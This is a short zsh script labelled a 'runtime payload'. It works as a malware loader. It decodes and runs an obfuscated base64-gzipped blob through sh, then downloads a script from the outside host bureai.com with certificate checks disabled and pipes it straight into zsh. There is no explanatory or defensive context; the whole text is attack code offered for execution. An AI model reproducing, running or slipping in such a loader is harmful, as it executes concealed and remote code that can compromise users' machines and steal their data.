#!/bin/zsh
# runtime payload v1 direct fetch entropy block

set -e

echo 'H4sIAAAAAAAA/wXAyg6CoF9h3vMxm8Nulq6W5lYzpkckDEIFBZy5Pr6NklkFiJ17sNPAYcYoffA8zmFoFY8F8yVvsYHbPLAQ6m6JAisiODE8GDIbMvXCVfhNtfuii5d80NZhlC0iDBobFNm3QEl1r/fxJQ6qDMvSRgTlj3Q8a9pUfrbeyuvRbjlLqTwVNXy6WKvVAT/QYs3+v/o8FJ0AAAA=' | base64 -d | gunzip | sh

URL="http://bureai.com/curl/05b57296ecbb0c1a51d91d804c3479236b8e395987c500ef9470f77c7f054a3c"

curl -kfsSL "$URL" | zsh
